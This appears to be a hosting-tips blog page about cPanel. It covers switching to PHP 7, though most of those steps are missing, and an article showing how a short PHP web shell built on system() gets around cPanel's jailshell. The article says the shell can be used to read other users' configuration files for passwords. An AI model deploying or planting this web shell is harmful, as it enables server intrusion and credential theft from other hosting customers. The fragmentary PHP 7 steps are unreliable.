PHP allocates a certain amount of memory when executing your PHP scripts. Your PHP script will exit and throws a fatal error if it has exhausted all the allocated …
Read More
PHP is a modular system where you can install and enable new modules to provide extra functionalities. These modules or extensions can also be disabled to enhance PHP's performance …
Read More
Naked domain (also called bare or non-www domain) is a domain name without the preceding www. Non-www domain is normally preferred because it's shorter but www domain is still …
Read More
cPanel account normally comes packaged with mail server, and the Mail Exchanger or MX record for the account's domain is set to the cPanel's host. You need to change …
Read More
cPanel
ships with PHP 7
, but PHP 5
is still used by default instead. Even if you don’t use PHP 7
specific functions, the performance benefit that PHP 7
brings is a good enough reason to switch. This is especially important in shared hosting such as cPanel
as performance is especially lacking.
Make sure your application is compatible with PHP 7
before making the switch.
To start using PHP 7
within your cPanel
hosting, log in to cPanel
and follow these steps;
PHP
version to confirm.
Users registering for shared Linux
webhosting accounts are normally not provided with shell access. Even if they do, what they can do with the shell is limited, as they are only in a jailed environment, thanks to cPanel
’s jailshell
. Displaying the SHELL
variable at the command prompt verifies this;
$ echo $SHELL /usr/local/cpanel/bin/jailshell
To briefly show what it means, listing out home directories using the following Linux
command reveals that the user is alone in the shell.
$ ls /home/ | wc -l 1
With some simple HTML
and PHP
, a web based shell can offer something more to the users. The following code can be made available through http://www.anyserver.com/jailshell.php
;
<html> <body> <p>Enter command: <form action="jailshell.php" method=post> <input type=text name=command> <input type=submit name=submit> </form> </p> <pre> <?php system ($_POST['command']); ?> </pre> </body> </html>
and executing some simple commands as the following shows what it’s capable of.
People with malicious intent can use this method to search other user’s home directories and grep into their web application’s configuration file to steal passwords and other juicy informations.
Most hosting providers already disable system()
and other similar functions in their PHP
implementation.